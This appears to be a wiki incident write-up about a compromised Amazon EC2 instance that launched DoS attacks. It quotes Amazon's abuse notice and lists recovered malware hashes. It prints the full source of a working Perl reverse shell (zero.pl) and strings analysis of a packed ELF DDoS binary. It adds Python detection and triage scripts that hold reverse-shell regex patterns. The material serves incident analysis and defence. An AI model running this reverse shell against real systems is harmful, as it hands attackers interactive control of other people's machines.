Virus/zero.pl

From Omnia
From: Amazon EC2 Abuse
Subject: Your Amazon EC2 Abuse Report [16614771493-2]
Date: July 7, 2014 at 6:41:49 AM MST
Reply-To: Amazon EC2 Abuse <ec2-abuse@amazon.com>

Dear Amazon EC2 Customer,

We've received a report that your instance(s):

Instance Id: i-XXXXXXXX

has been making Denial of Service attacks against remote hosts on the Internet.

Check the information provided below by the abuse reporter.

This is specifically forbidden in our User Agreement: http://aws.amazon.com/agreement/

Please immediately restrict the flow of traffic from your instance(s) to cease
disruption to other networks and reply to this email to send your reply of action
to the original abuse reporter. This will activate a flag in our ticketing
system, letting us know that you have acknowledged receipt of this email.

It's possible that your environment has been compromised by an external attacker.
It remains your responsibility to ensure that your instances and all applications
are secured. The link http://developer.amazonwebservices.com/connect/entry.jspa?externalID=1233
provides some suggestions for securing your instances.

It has come to our attention that Denial of Service (DoS) attacks were launched from your instance
to IP XXX.XXX.XXX.XXX via UDP port(s) 80. Please investigate your instance(s) and reply detailing
the corrective measures you will be taking to address this activity.

Case number: 16614771493-1

Additional abuse report information provided by original abuse reporter:
* Destination IPs:
* Destination Ports:
* Destination URLs:
* Abuse Time: Mon Jul 07 13:25:43 UTC 2014
* Log Extract:
<<<
It has come to our attention that Denial of Service (DoS) attacks were launched from your instance to
IP 116.31.100.90 via UDP port(s) 80. Please investigate your instance(s) and reply detailing the
corrective measures you will be taking to address this activity.

In the meantime, we have blocked outbound UDP 80 on the instance(s) to prevent further abuse.

If you believe that you were compromised by an external attacker, the best recourse is to back up your
data, migrate your applications to a new instance, and terminate the old one. Attempting to repair a
compromised instance does not guarantee a successful cleanup in most cases. We recommend reviewing the
following resources to ensure your EC2 environment is properly secured:

* Amazon EC2 Security Groups User Guide:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html

* AWS Security Resources:
http://aws.amazon.com/security/security-resources/

* AWS Security Best Practices:
https://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf

Thanks in advance for your attention to this report.


Files found:

c3fd28831d9fc683000273643b5bef12  zero.pl
4206e8b780cf3758baa76b1002e61792  .Linux_time_y_2015

Guessing they somehow came through a security exploit in ElasticSearch.

zero.pl: (also found here: [1])

#!/usr/bin/perl -w
# Comments below are analysis notes on the recovered file, not part of it.
# Summary: a TCP reverse shell. It connects out to the IP/port given on the
# command line and attaches an interactive bash to that connection.

use strict;
use Socket;
use IO::Handle;

# Usage check: exactly two arguments, the remote IP and port to connect to.
if($#ARGV+1 != 2){
print "$#ARGV $0 Remote_IP Remote_Port \n";
exit 1;
}

my $remote_ip = $ARGV[0];
my $remote_port = $ARGV[1];

# Packed sockaddr_in for the remote end.
my $proto = getprotobyname("tcp");
my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));

# Interactive bash, so the remote side gets a prompt.
my $shell = '/bin/bash -i';

socket(SOCK, AF_INET, SOCK_STREAM, $proto);

STDOUT->autoflush(1);
SOCK->autoflush(1);

connect(SOCK,$pack_addr) or die "can not connect:$!";

# Duplicates the socket onto stdin/stdout/stderr: the shell spawned below reads
# its commands from, and writes its output to, the remote host.
open STDIN, "<&SOCK";
open STDOUT, ">&SOCK";
open STDERR, ">&SOCK";

print "Enjoy the shell.\n";

system($shell);
close SOCK;

exit 0;
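
The Python script below is an added example, not part of this page or of the recovered sample: a defender-side heuristic that flags Perl scripts combining the three stages the zero.pl listing goes through (loading Socket and connecting out, duplicating STDIN/STDOUT/STDERR onto a socket handle, and spawning a child process). The regexes, the "two or more redirected handles" threshold and the two embedded Perl snippets are this example's own constructions; the benign snippet deliberately uses Socket and connect so that those alone do not trigger the rule.

```python
import re
import sys
from pathlib import Path

# Each indicator is a regex over the script text. They correspond to stages the
# zero.pl listing above goes through; patterns and thresholds are this example's own.
INDICATORS = {
    "socket_module": re.compile(r"^\s*use\s+(?:IO::)?Socket\b", re.M),
    "outbound_connect": re.compile(r"\bconnect\s*\(\s*\w+\s*,"),
    "spawns_shell": re.compile(r"\b(?:system|exec)\s*\("),
    "interactive_shell": re.compile(r"/bin/(?:ba)?sh\s+-i\b"),
}
# open STDIN, "<&SOCK" style duplication of a standard handle onto another handle
STDIO_DUP = re.compile(r"open\s+(STDIN|STDOUT|STDERR)\s*,\s*['\"][<>]&\s*\w+")


def scan_perl(text: str) -> dict:
    """Return per-indicator hits plus a combined verdict for one Perl script's text."""
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    redirected = set(STDIO_DUP.findall(text))
    hits["stdio_redirected"] = sorted(redirected)
    # Verdict: outbound connection + at least two standard handles pointed at
    # another handle + a child process. Any one of these alone is common in
    # legitimate scripts, which is why the rule needs the whole chain.
    hits["reverse_shell_pattern"] = bool(
        hits["socket_module"]
        and hits["outbound_connect"]
        and len(redirected) >= 2
        and hits["spawns_shell"]
    )
    return hits


def scan_tree(root: str) -> list:
    """Walk a directory and return the Perl scripts whose text matches the pattern."""
    flagged = []
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        try:
            head = p.read_bytes()[:4096]
        except OSError:
            continue
        shebang = head.split(b"\n", 1)[0]
        if p.suffix == ".pl" or (head.startswith(b"#!") and b"perl" in shebang):
            if scan_perl(p.read_text(errors="replace"))["reverse_shell_pattern"]:
                flagged.append(str(p))
    return flagged


# Constructed test inputs. The first reduces the zero.pl listing to the lines the
# rule keys on; the second is an ordinary HTTP fetch that also uses Socket/connect.
SUSPECT_SCRIPT = """use Socket;
connect(SOCK, $pack_addr) or die "can not connect:$!";
open STDIN, "<&SOCK";
open STDOUT, ">&SOCK";
open STDERR, ">&SOCK";
system('/bin/bash -i');
"""

BENIGN_SCRIPT = """use Socket;
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCK, sockaddr_in(80, inet_aton('example.com'))) or die "connect: $!";
print SOCK "GET / HTTP/1.0\\r\\n\\r\\n";
while (<SOCK>) { print }
close SOCK;
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path in scan_tree(sys.argv[1]):
            print("reverse-shell pattern:", path)
    else:
        for label, script in (("suspect", SUSPECT_SCRIPT), ("benign", BENIGN_SCRIPT)):
            print(label, scan_perl(script))
```

Run it with a directory argument to sweep a web root or a temp directory; without one it scans the two embedded snippets and prints the per-indicator breakdown, which is the part worth keeping in a ticket, since a single indicator firing is not evidence on its own.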

.Linux_time_y_2015: (binary)

  • statically linked executable
  • file: linux: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
  • strings:
  • upx decompressed strings:
    • "std::basic_string" -- implies the binary was built from C++ source
    • "Keld Simonsen" -- fluke? compiler?
      • "keld@dkuug.dk"
      • "+45 3122-6543"
      • "+45 3325-6543"
      • "1997-12-20"
      • "ISO/IEC JTC1/SC22/WG20 - internationalization"
      • "C/o Keld Simonsen, Skt. Jorgens Alle 8, DK-1615 Kobenhavn V"
    • "GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)" -- compiler
    • Source files mentioned: (possibly related: [2])
      • Fake.cpp
      • Global.cpp
      • main.cpp
      • Manager.cpp
      • ServerIP.cpp
      • StatBase.cpp
      • ThreadAttack.cpp
      • ThreadHostStatus.cpp
      • ThreadTaskManager.cpp
      • ThreadTimer.cpp
      • AutoLock.cpp
      • FileOp.cpp
      • Log.cpp
      • Md5.cpp
      • Media.cpp
      • NetBase.cpp
      • ThreadCondition.cpp
      • Thread.cpp
      • ThreadMutex.cpp
      • Utility.cpp
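
The following Python script is an added example, not part of this page: a small triage helper that applies the findings listed above to an arbitrary file. It computes the MD5 and compares it with the two hashes in the "Files found" list, checks the ELF identification bytes for the 32-bit LSB Intel 80386 layout that file(1) reported, looks for the UPX magic as a packed-or-not hint, and runs a strings(1)-style pass looking for the source file names recovered from the decompressed binary. The embedded sample is a constructed ELF header plus strings modelled on the page's findings, not the real malware bytes; the MD5 and source-name tables are copied from the page.

```python
import hashlib
import re
import struct
import sys

# MD5s copied from the "Files found" list on this page.
KNOWN_BAD_MD5 = {
    "c3fd28831d9fc683000273643b5bef12": "zero.pl",
    "4206e8b780cf3758baa76b1002e61792": ".Linux_time_y_2015",
}

# Source file names the page recovered from the UPX-decompressed binary.
SOURCE_FILE_STRINGS = {
    "Fake.cpp", "Global.cpp", "main.cpp", "Manager.cpp", "ServerIP.cpp",
    "StatBase.cpp", "ThreadAttack.cpp", "ThreadHostStatus.cpp",
    "ThreadTaskManager.cpp", "ThreadTimer.cpp", "AutoLock.cpp", "FileOp.cpp",
    "Log.cpp", "Md5.cpp", "Media.cpp", "NetBase.cpp", "ThreadCondition.cpp",
    "Thread.cpp", "ThreadMutex.cpp", "Utility.cpp",
}

EM_386 = 3  # ELF e_machine value for Intel 80386


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def match_known_hash(data: bytes):
    """Name from the page's hash list if the MD5 matches, else None."""
    return KNOWN_BAD_MD5.get(md5_hex(data))


def is_elf32_i386(data: bytes) -> bool:
    """Check the ELF identification bytes for a 32-bit little-endian i386 image."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return False
    ei_class, ei_data = data[4], data[5]  # 1 = ELFCLASS32, 1 = ELFDATA2LSB
    if ei_class != 1 or ei_data != 1:
        return False
    (e_machine,) = struct.unpack_from("<H", data, 18)  # e_machine follows e_type
    return e_machine == EM_386


def looks_upx_packed(data: bytes) -> bool:
    """UPX keeps its 'UPX!' magic in the packed file; a cheap packed-or-not hint."""
    return b"UPX!" in data


def ascii_strings(data: bytes, min_len: int = 4) -> list:
    """Rough strings(1): runs of printable ASCII at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def source_file_hits(data: bytes) -> list:
    """Which of the page's source-file names occur in the strings output."""
    found = {name for s in ascii_strings(data) for name in SOURCE_FILE_STRINGS if name in s}
    return sorted(found)


def triage(data: bytes) -> dict:
    return {
        "md5": md5_hex(data),
        "known_bad": match_known_hash(data),
        "elf32_i386": is_elf32_i386(data),
        "upx_marker": looks_upx_packed(data),
        "source_hits": source_file_hits(data),
    }


# Constructed sample, not the real malware: a minimal ELF32/i386 header followed
# by strings modelled on what the page reports.
SAMPLE_BINARY = (
    b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # e_ident: class, data, version, OS ABI
    + struct.pack("<HH", 2, EM_386)                  # e_type = ET_EXEC, e_machine = EM_386
    + b"\x00" * 32                                   # rest of the header, zeroed
    + b"UPX!\x00"
    + b"GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)\x00"
    + b"ThreadAttack.cpp\x00ServerIP.cpp\x00main.cpp\x00"
)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BINARY
    for key, value in triage(data).items():
        print(f"{key}: {value}")
```

Run it as `python triage.py /path/to/suspect` on a copy of the file; with no argument it triages the embedded sample. The hash match is the only exact indicator; the ELF, UPX and source-name checks are there so that a recompiled or repacked variant with a different MD5 still stands out during a sweep of a compromised instance.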